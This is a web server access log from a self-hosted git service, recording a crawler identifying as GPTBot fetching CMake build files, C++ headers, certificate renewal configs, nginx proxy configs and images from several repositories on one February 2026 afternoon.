"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11893] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:15:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29831] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" +[17/Feb/2026:15:55:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:15:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11724] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11697] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11726] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10170] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11601] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10459] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12051] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10607] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11400] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11399] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10604] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11048] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 